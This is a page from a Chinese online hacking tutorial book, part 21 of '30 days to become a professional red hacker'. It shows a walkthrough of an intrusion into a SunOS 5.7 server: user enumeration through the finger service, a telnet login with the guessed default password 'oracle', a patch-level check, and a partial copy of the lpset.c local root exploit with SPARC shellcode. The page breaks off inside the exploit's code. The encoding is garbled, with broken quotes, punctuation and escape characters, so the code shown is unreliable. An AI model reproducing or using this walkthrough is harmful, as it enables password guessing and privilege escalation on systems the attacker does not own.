友情提示:如果本网页打开太慢或显示不完整,请尝试鼠标右键“刷新”本网页!阅读过程发现任何错误请告诉我们,谢谢!! 报告错误
聚奇塔 返回本书目录 我的书架 我的书签 TXT全本下载 进入书吧 加入书签

30天打造专业红客-第21部分

按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!



liuy???pts/5   211。101。132。50
oracle ???console  6:57 Mon 14:29  :0
oracle ???pts/24d Mon 14:29  :0。0
oracle ???pts/522 Sat 16:34  61。140。253。142
D:》
存在finger漏洞。系统的用户显示出来了。(chenhy、mdevice、liuy、orcle)
oracle,通常oracle的密码就是oracle。
马上试一下!
D:》tel 127。0。0。17
SunOS 5。7
login: oracle
Password:
Last login: Sat Aug  4 17:25:49 from 61。140。253。142
Sun Microsystems Inc。SunOS 5。7 Generic October 1998

成功了!
假如在这一步并没有猜到用户的密码,我们可以利用其他工具继续猜测。
 
命令:uname …a
查看主机的信息。 
uname …a
SunOS mars 5。7 Generic_106541…08 sun4u sparc SUNW;Ultra…5_10
SunOS mars 5。7:SunOS的版本。
sparc:服务器版本。
Generic_106541…08:补丁情况。
 
找到exploit:lpset。c
cat 》lpst。c
/*## copyright LAST STAGE OF DELIRIUM apr 2000 poland  *://lsd…pl。/ #*/
/*## /usr/bin/lpset #*/
#define NOPNUM 864
#define ADRNUM 132
#define ALLIGN 3
char shellcode''=
 〃x20xbfxffxff〃  /* bn;a   */
 〃x20xbfxffxff〃  /* bn;a  */
 〃x7fxffxffxff〃  /* call   */
 〃x90x03xe0x20〃  /* add  %o7;32;%o0  */
 〃x92x02x20x10〃  /* add  %o0;16;%o1  */
 〃xc0x22x20x08〃  /* st%g0;'%o0+8' */
 〃xd0x22x20x10〃  /* st%o0;'%o0+16'*/
 〃xc0x22x20x14〃  /* st%g0;'%o0+20'*/
 〃x82x10x20x0b〃  /* mov  0xb;%g1  */
 〃x91xd0x20x08〃  /* ta8  */
 〃/bin/ksh〃

char jump''=
 〃x81xc3xe0x08〃  /* jmp  %o7+8 */
 〃x90x10x00x0e〃  /* mov  %sp;%o0  */

static char nop''=〃x80x1cx40x11〃;
main(int argc;char **argv){
 char buffer'10000';adr'4';*b;
 int i;
 printf(〃copyright LAST STAGE OF DELIRIUM apr 2000 poland  //lsd…pl。/n〃);
 printf(〃/usr/bin/lpset for solaris 2。6 2。7 sparcnn〃);
 *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;
 b=buffer;
 sprintf(b;〃***=〃);
 b+=4;
 for(i=0;i
返回目录 上一页 下一页 回到顶部 1 1
未阅读完?加入书签已便下次继续阅读!
温馨提示: 温看小说的同时发表评论,说出自己的看法和其它小伙伴们分享也不错哦!发表书评还可以获得积分和经验奖励,认真写原创书评 被采纳为精评可以获得大量金币、积分和经验奖励哦!